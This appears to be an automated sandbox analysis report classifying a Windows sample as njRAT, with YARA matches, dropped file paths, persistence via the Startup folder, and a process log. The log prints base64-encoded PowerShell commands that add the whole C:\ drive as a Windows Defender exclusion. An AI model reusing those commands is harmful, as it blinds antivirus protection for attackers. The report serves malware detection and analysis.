Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi

Source: classification engine

Classification label: mal100.phis.bank.troj.adwa.spyw.expl.evad.winEXE@38/29@5/4

Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00A7AD86 AdjustTokenPrivileges,	15_2_00A7AD86
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00A7AD4F AdjustTokenPrivileges,	15_2_00A7AD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_006BAD86 AdjustTokenPrivileges,	20_2_006BAD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_006BAD4F AdjustTokenPrivileges,	20_2_006BAD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 24_2_00A5AD86 AdjustTokenPrivileges,	24_2_00A5AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 24_2_00A5AD4F AdjustTokenPrivileges,	24_2_00A5AD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_00D3AD86 AdjustTokenPrivileges,	25_2_00D3AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_00D3AD4F AdjustTokenPrivileges,	25_2_00D3AD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 26_2_0095AD86 AdjustTokenPrivileges,	26_2_0095AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 26_2_0095AD4F AdjustTokenPrivileges,	26_2_0095AD4F

Source: C:\Users\user\Desktop\virus.exe.bin.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3828:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\c382eb151c59bd833b24120723eac541

Source: C:\Users\user\Desktop\virus.exe.bin.exe

File created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted

Jump to behavior

Source: virus.exe.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: virus.exe.bin.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\virus.exe.bin.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\virus.exe.bin.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: virus.exe.bin.exe	ReversingLabs: Detection: 66%
Source: virus.exe.bin.exe	Virustotal: Detection: 65%

Source: javaw.exe	String found in binary or memory: H[Ljavafx/scene/paint/Stop;
Source: javaw.exe	String found in binary or memory: H[Ljavafx/scene/paint/Stop;
Source: javaw.exe	String found in binary or memory: C@(ZD)[Ljavafx/scene/paint/Stop;
Source: javaw.exe	String found in binary or memory: C@(ZD)[Ljavafx/scene/paint/Stop;
Source: javaw.exe	String found in binary or memory: twccom/sun/javafx/application/LauncherImpl$$Lambda$54
Source: javaw.exe	String found in binary or memory: com/sun/javafx/application/LauncherImpl$$Lambda$48

Source: C:\Users\user\Desktop\virus.exe.bin.exe

File read: C:\Users\user\Desktop\virus.exe.bin.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\virus.exe.bin.exe "C:\Users\user\Desktop\virus.exe.bin.exe"
Source: unknown	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe"
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js" /elevate
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
